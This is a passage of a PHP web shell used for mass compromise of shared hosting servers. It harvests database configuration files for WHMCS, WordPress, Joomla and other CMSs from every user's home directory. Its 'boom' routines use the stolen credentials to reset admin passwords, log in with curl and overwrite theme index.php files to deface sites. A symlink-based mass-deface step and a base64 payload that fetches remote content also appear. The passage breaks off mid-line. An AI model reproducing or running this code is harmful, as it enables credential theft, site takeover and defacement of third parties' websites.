1058 "/home/$user_idx/public_html/whmcs1/configuration.php" => "WHMCS",
1059 "/home/$user_idx/public_html/Whmcs/configuration.php" => "WHMCS",
1060 "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
1061 "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
1062 "/home/$user_idx/public_html/WHMC/configuration.php" => "WHMCS",
1063 "/home/$user_idx/public_html/Whmc/configuration.php" => "WHMCS",
1064 "/home/$user_idx/public_html/whmc/configuration.php" => "WHMCS",
1065 "/home/$user_idx/public_html/WHM/configuration.php" => "WHMCS",
1066 "/home/$user_idx/public_html/Whm/configuration.php" => "WHMCS",
1067 "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
1068 "/home/$user_idx/public_html/HOST/configuration.php" => "WHMCS",
1069 "/home/$user_idx/public_html/Host/configuration.php" => "WHMCS",
1070 "/home/$user_idx/public_html/host/configuration.php" => "WHMCS",
1071 "/home/$user_idx/public_html/SUPPORTES/configuration.php" => "WHMCS",
1072 "/home/$user_idx/public_html/Supportes/configuration.php" => "WHMCS",
1073 "/home/$user_idx/public_html/supportes/configuration.php" => "WHMCS",
1074 "/home/$user_idx/public_html/domains/configuration.php" => "WHMCS",
1075 "/home/$user_idx/public_html/domain/configuration.php" => "WHMCS",
1076 "/home/$user_idx/public_html/Hosting/configuration.php" => "WHMCS",
1077 "/home/$user_idx/public_html/HOSTING/configuration.php" => "WHMCS",
1078 "/home/$user_idx/public_html/hosting/configuration.php" => "WHMCS",
1079 "/home/$user_idx/public_html/CART/configuration.php" => "WHMCS",
1080 "/home/$user_idx/public_html/Cart/configuration.php" => "WHMCS",
1081 "/home/$user_idx/public_html/cart/configuration.php" => "WHMCS",
1082 "/home/$user_idx/public_html/ORDER/configuration.php" => "WHMCS",
1083 "/home/$user_idx/public_html/Order/configuration.php" => "WHMCS",
1084 "/home/$user_idx/public_html/order/configuration.php" => "WHMCS",
1085 "/home/$user_idx/public_html/CLIENT/configuration.php" => "WHMCS",
1086 "/home/$user_idx/public_html/Client/configuration.php" => "WHMCS",
1087 "/home/$user_idx/public_html/client/configuration.php" => "WHMCS",
1088 "/home/$user_idx/public_html/CLIENTAREA/configuration.php" => "WHMCS",
1089 "/home/$user_idx/public_html/Clientarea/configuration.php" => "WHMCS",
1090 "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
1091 "/home/$user_idx/public_html/SUPPORT/configuration.php" => "WHMCS",
1092 "/home/$user_idx/public_html/Support/configuration.php" => "WHMCS",
1093 "/home/$user_idx/public_html/support/configuration.php" => "WHMCS",
1094 "/home/$user_idx/public_html/BILLING/configuration.php" => "WHMCS",
1095 "/home/$user_idx/public_html/Billing/configuration.php" => "WHMCS",
1096 "/home/$user_idx/public_html/billing/configuration.php" => "WHMCS",
1097 "/home/$user_idx/public_html/BUY/configuration.php" => "WHMCS.txt",
1098 "/home/$user_idx/public_html/Buy/configuration.php" => "WHMCS.txt",
1099 "/home/$user_idx/public_html/buy/configuration.php" => "WHMCS.txt",
1100 "/home/$user_idx/public_html/MANAGE/configuration.php" => "WHMCS.txt",
1101 "/home/$user_idx/public_html/Manage/configuration.php" => "WHMCS.txt",
1102 "/home/$user_idx/public_html/manage/configuration.php" => "WHMCS.txt",
1103 "/home/$user_idx/public_html/CLIENTSUPPORT/configuration.php" => "WHMCS",
1104 "/home/$user_idx/public_html/ClientSupport/configuration.php" => "WHMCS",
1105 "/home/$user_idx/public_html/Clientsupport/configuration.php" => "WHMCS",
1106 "/home/$user_idx/public_html/clientsupport/configuration.php" => "WHMCS",
1107 "/home/$user_idx/public_html/CHECKOUT/configuration.php" => "WHMCS",
1108 "/home/$user_idx/public_html/Checkout/configuration.php" => "WHMCS",
1109 "/home/$user_idx/public_html/checkout/configuration.php" => "WHMCS",
1110 "/home/$user_idx/public_html/BILLINGS/configuration.php" => "WHMCS",
1111 "/home/$user_idx/public_html/Billings/configuration.php" => "WHMCS",
1112 "/home/$user_idx/public_html/billings/configuration.php" => "WHMCS",
1113 "/home/$user_idx/public_html/BASKET/configuration.php" => "WHMCS",
1114 "/home/$user_idx/public_html/Basket/configuration.php" => "WHMCS",
1115 "/home/$user_idx/public_html/basket/configuration.php" => "WHMCS",
1116 "/home/$user_idx/public_html/SECURE/configuration.php" => "WHMCS",
1117 "/home/$user_idx/public_html/Secure/configuration.php" => "WHMCS",
1118 "/home/$user_idx/public_html/secure/configuration.php" => "WHMCS",
1119 "/home/$user_idx/public_html/SALES/configuration.php" => "WHMCS",
1120 "/home/$user_idx/public_html/Sales/configuration.php" => "WHMCS",
1121 "/home/$user_idx/public_html/sales/configuration.php" => "WHMCS",
1122 "/home/$user_idx/public_html/BILL/configuration.php" => "WHMCS",
1123 "/home/$user_idx/public_html/Bill/configuration.php" => "WHMCS",
1124 "/home/$user_idx/public_html/bill/configuration.php" => "WHMCS",
1125 "/home/$user_idx/public_html/PURCHASE/configuration.php" => "WHMCS",
1126 "/home/$user_idx/public_html/Purchase/configuration.php" => "WHMCS",
1127 "/home/$user_idx/public_html/purchase/configuration.php" => "WHMCS",
1128 "/home/$user_idx/public_html/ACCOUNT/configuration.php" => "WHMCS",
1129 "/home/$user_idx/public_html/Account/configuration.php" => "WHMCS",
1130 "/home/$user_idx/public_html/account/configuration.php" => "WHMCS",
1131 "/home/$user_idx/public_html/USER/configuration.php" => "WHMCS",
1132 "/home/$user_idx/public_html/User/configuration.php" => "WHMCS",
1133 "/home/$user_idx/public_html/user/configuration.php" => "WHMCS",
1134 "/home/$user_idx/public_html/CLIENTS/configuration.php" => "WHMCS",
1135 "/home/$user_idx/public_html/Clients/configuration.php" => "WHMCS",
1136 "/home/$user_idx/public_html/clients/configuration.php" => "WHMCS",
1137 "/home/$user_idx/public_html/BILLINGS/configuration.php" => "WHMCS",
1138 "/home/$user_idx/public_html/Billings/configuration.php" => "WHMCS",
1139 "/home/$user_idx/public_html/billings/configuration.php" => "WHMCS",
1140 "/home/$user_idx/public_html/MY/configuration.php" => "WHMCS",
1141 "/home/$user_idx/public_html/My/configuration.php" => "WHMCS",
1142 "/home/$user_idx/public_html/my/configuration.php" => "WHMCS",
1143 "/home/$user_idx/public_html/secure/whm/configuration.php" => "WHMCS",
1144 "/home/$user_idx/public_html/secure/whmcs/configuration.php" => "WHMCS",
1145 "/home/$user_idx/public_html/panel/configuration.php" => "WHMCS",
1146 "/home/$user_idx/public_html/clientes/configuration.php" => "WHMCS",
1147 "/home/$user_idx/public_html/cliente/configuration.php" => "WHMCS",
1148 "/home/$user_idx/public_html/support/order/configuration.php" => "WHMCS",
1149 "/home/$user_idx/public_html/forum/config.php" => "phpBB",
1150 "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
1151 "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
1152 "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
1153 "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
1154 "/home/$user_idx/public_html/configuration.php" => "Joomla",
1155 "/home/$user_idx/public_html/administrator/config.php" => "Joomla",
1156 "/home/$user_idx/public_html/blog/configuration.php" => "Joomla",
1157 "/home/$user_idx/public_html/cms/configuration.php" => "Joomla.txt",
1158 "/home/$user_idx/public_html/beta/configuration.php" => "Joomla",
1159 "/home/$user_idx/public_html/portal/configuration.php" => "Joomla",
1160 "/home/$user_idx/public_html/site/configuration.php" => "Joomla",
1161 "/home/$user_idx/public_html/main/configuration.php" => "Joomla",
1162 "/home/$user_idx/public_html/home/configuration.php" => "Joomla",
1163 "/home/$user_idx/public_html/demo/configuration.php" => "Joomla",
1164 "/home/$user_idx/public_html/test/configuration.php" => "Joomla",
1165 "/home/$user_idx/public_html/v1/configuration.php" => "Joomla",
1166 "/home/$user_idx/public_html/v2/configuration.php" => "Joomla",
1167 "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
1168 "/home/$user_idx/public_html/new/configuration.php'" => "Joomla",
1169 "/home/$user_idx/public_html/wp/test/wp-config.php" => "Wordpress",
1170 "/home/$user_idx/public_html/blog/wp-config.php" => "Wordpress",
1171 "/home/$user_idx/public_html/beta/wp-config.php" => "Wordpress",
1172 "/home/$user_idx/public_html/portal/wp-config.php" => "Wordpress",
1173 "/home/$user_idx/public_html/site/wp-config.php" => "Wordpress",
1174 "/home/$user_idx/public_html/WP/wp-config.php" => "Wordpress",
1175 "/home/$user_idx/public_html/news/wp-config.php" => "Wordpress",
1176 "/home/$user_idx/public_html/test/wp-config.php" => "Wordpress",
1177 "/home/$user_idx/public_html/demo/wp-config.php" => "Wordpress",
1178 "/home/$user_idx/public_html/home/wp-config.php" => "Wordpress",
1179 "/home/$user_idx/public_html/v1/wp-config.php" => "Wordpress",
1180 "/home/$user_idx/public_html/v2/wp-config.php" => "Wordpress",
1181 "/home/$user_idx/public_html/press/wp-config.php" => "Wordpress",
1182 "/home/$user_idx/public_html/new/wp-config.php" => "Wordpress",
1183 "/home/$user_idx/public_html/blogs/wp-config.php" => "Wordpress",
1184 "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
1185 "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
1186 "/home/$user_idx/public_html/wp-config.php" => "WordPress",
1187 "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
1188 "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
1189 "/home/$user_idx/public_html/application/config/database.php" => "Ellislab",
1190 "/home/$user_idx/public_html/db/db.php" => "Unknown",
1191 "/home/$user_idx/public_html/setdatabaseb.php" => "Unknown",
1192 "/home/$user_idx/public_html/db/setdatabaseb.php" => "Unknown",
1193 "/home/$user_idx/public_html/database/db.php" => "Unknown",
1194 "/home/$user_idx/public_html/koneksi/db.php" => "Unknown",
1195 "/home/$user_idx/public_html/koneksi/database.php" => "Unknown",
1196 "/home/$user_idx/public_html/koneksi/koneksi.php" => "Unknown",
1197 "/home/$user_idx/public_html/db/config.php" => "Unknown",
1198 "/home/$user_idx/public_html/db/database.php" => "Unknown",
1199 "/home/$user_idx/public_html/database/config.php" => "Unknown",
1200 "/home/$user_idx/public_html/konfigurasi/conf.php" => "Unknown",
1201 "/home/$user_idx/public_html/konfigurasi/database.php" => "Unknown",
1202 "/home/$user_idx/public_html/conf/db.php" => "Unknown",
1203 "/home/$user_idx/public_html/conf/php.php" => "Unknown",
1204 "/home/$user_idx/public_html/conf/config.php" => "Unknown",
1205 "/home/$user_idx/public_html/conf/conf.php" => "Unknown",
1206 "/home/$user_idx/public_html/admin/koneksi.php" => "Unknown",
1207 "/home/$user_idx/public_html/cf/db.php" => "Unknown",
1208 "/home/$user_idx/public_html/config/index.php" => "Unknown",
1209 "/home/$user_idx/public_html/config/data.php" => "Unknown",
1210 "/home/$user_idx/public_html/admin/db.php" => "Unknown",
1211 "/home/$user_idx/public_html/admin/config.php" => "Unknown",
1212 "/home/$user_idx/public_html/admin/configuration.php" => "Unknown",
1213 "/home/$user_idx/public_html/admin/conf.php" => "Unknown",
1214 "/home/$user_idx/public_html/configuracion/connection.php" => "Unknown",
1215 "/home/$user_idx/public_html/connection" => "Unknown",
1216 "/home/$user_idx/public_html/konfigurasi/config.php" => "Unknown",
1217 "/home/$user_idx/public_html/admin/inc/config.php" => "Unknown",
1218 "/home/$user_idx/public_html/inc/config.php" => "Unknown",
1219 "/home/$user_idx/public_html/admin/inc/db.php" => "Unknown",
1220 "/home/$user_idx/public_html/inc/db.php" => "Unknown",
1221 "/home/$user_idx/public_html/admin/inc/configuration.php" => "Unknown",
1222 "/home/$user_idx/public_html/inc/configuration.php" => "Unknown",
1223 "/home/$user_idx/public_html/include/configuration.php" => "Unknown",
1224 "/home/$user_idx/public_html/include/config.php" => "Unknown",
1225 "/home/$user_idx/public_html/include/db.php" => "Unknown",
1226 "/home/$user_idx/public_html/inc/database.php" => "Unknown",
1227 "/home/$user_idx/public_html/include/database.php" => "Unknown",
1228 "/home/$user_idx/public_html/include/configuration.php" => "Unknown",
1229 "/home/$user_idx/public_html/includes/configuration.php" => "Unknown",
1230 "/home/$user_idx/public_html/includes/config.php" => "Unknown",
1231 "/home/$user_idx/public_html/includes/db.php" => "Unknown",
1232 "/home/$user_idx/public_html/includes/database.php" => "Unknown",
1233 "/home/$user_idx/public_html/vb/includes/config.php" => "Vbulletin",
1234 "/home/$user_idx/public_html/includes/config.php" => "Vbulletin",
1235 "/home/$user_idx/public_html/forum/includes/config.php" => "Vbulletin",
1236 "/home/$user_idx/public_html/forums/includes/config.php" => "Vbulletin",
1237 "/home/$user_idx/public_html/cc/includes/config.php" => "Vbulletin",
1238 "/home/$user_idx/public_html/inc/config.php" => "MyBB",
1239 "/home/$user_idx/public_html/includes/configure.php" => "OsCommerce",
1240 "/home/$user_idx/public_html/shop/includes/configure.php" => "OsCommerce",
1241 "/home/$user_idx/public_html/os/includes/configure.php" => "OsCommerce",
1242 "/home/$user_idx/public_html/oscom/includes/configure.php" => "OsCommerce",
1243 "/home/$user_idx/public_html/products/includes/configure.php" => "OsCommerce",
1244 "/home/$user_idx/public_html/cart/includes/configure.php" => "OsCommerce",
1245 "/home/$user_idx/public_html/inc/conf_global.php" => "IPB");
1246 foreach($grab_config as $config => $nama_config) {
1247 $ambil_config = file_get_contents($config);
1248 if($ambil_config == '') {
1249 } else {
1250 $file_config = fopen("priv_config/$user_idx-$nama_config.txt","w");
1251 fputs($file_config,$ambil_config);
1252 }
1253 }
1254 }
1255 }
1256 }
1257 }
1258 echo "<center><a href='?bom&folder=$dir/priv_config'><font color=lime>Done</font></a></center>";
1259} elseif($_GET['do'] == 'boom') {
1260 {error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() % 33;$tmp = substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function index_changer_wp($conf, $content) {$output = '';$dol = '$';$go = 0;$username = entre2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PASSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix = entre2v2($conf,$dol."table_prefix = '","'");$host = entre2v2($conf,"define('DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");} else {$output.= "[-] DB Error<br />";}if($req1) {$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"]; $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");$data = mysql_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_fetch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";$go = 1;}if($go) {$cond = 0;$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Updated Successfuly<br />";$hk = explode('public_html',$_file);$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond = 1;}} else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template Updated Successfuly<br />";$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}} else {$output.= "[-] index.php can not load in Theme Editor<br />";}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.'COOKIE.txt');return array('cond'=>$cond, 'output'=>$output);}function index_changer_joomla($conf, $content, $domain) {$doler = '$';$username = entre2v2($conf, $doler."user = '", "';");$password = entre2v2($conf, $doler."password = '", "';");$dbname = entre2v2($conf, $doler."db = '", "';");$prefix = entre2v2($conf, $doler."dbprefix = '", "';");$host = entre2v2($conf, $doler."host = '","';");$co=randomt();$site_url = "http://".$domain."/administrator";$output = '';$cond = 0; $link=mysql_connect($host, $username, $password);if($link) {mysql_select_db($dbname,$link) ;$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));} else {$output.= "[-] DB Error<br />";}if($req1){if ($req) {$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");$data = mysql_fetch_array($req);$template_name = $data["template"];$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");$data = mysql_fetch_array($req);$template_id = $data["extension_id"];$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);if($return && $hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_REFERER, $url2);curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos){$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);if($hidden2) {$output.= "[+] index.php file found in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}} else {$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);if($hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos) {$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);if($hidden2) {$output.= "[+] index.php file founded in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co);$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message fade">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.$co);return array('cond'=>$cond, 'output'=>$output); }function exec_mode_1($def_url) {@mkdir('sym',0777);$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp, $wr);@symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Total domains: $numero_dominios <br><br />";$def = file_get_contents($def_url);$def = urlencode($def);$dd = 'PD9waHANCiRkZWYgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3pvbmVobWlycm9ycy5vcmcvZGVmYWNlZC8yMDEzLzAzLzE5L2Fzc29jaWFwcmVzcy5uZXQnKTsNCiRwID0gZXhwbG9kZSgncHVibGljX2h0bWwnLGRpcm5hbWUoX19GSUxFX18pKTsNCiRwID0gJHBbMF0uJ3B1YmxpY19odG1sJzsNCmlmICgkaGFuZGxlID0gb3BlbmRpcigkcCkpIHsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXguaHRtbCcsJ3crJyk7DQogICAgQGZ3cml0ZSgkZnAxLCAkZGVmKTsNCiAgICAkZnAxID0gQGZvcGVuKCRwLicvaW5kZXgucGhwJywndysnKTsNCiAgICBAZndyaXRlKCRmcDEsICRkZWYpOw0KICAgICRmcDEgPSBAZm9wZW4oJHAuJy9pbmRleC5odG0nLCd3KycpOw0KICAgIEBmd3JpdGUoJGZwMSwgJGRlZik7DQogICAgZWNobyAnRG9uZSc7DQp9DQpjbG9zZWRpcigkaGFuZGxlKTsNCnVubGluayhfX0ZJTEVfXyk7DQo/Pg==';$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html', 'a+');$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;echo '<table style="width:75%;" align="center"><tr style="background:rgba(160, 82, 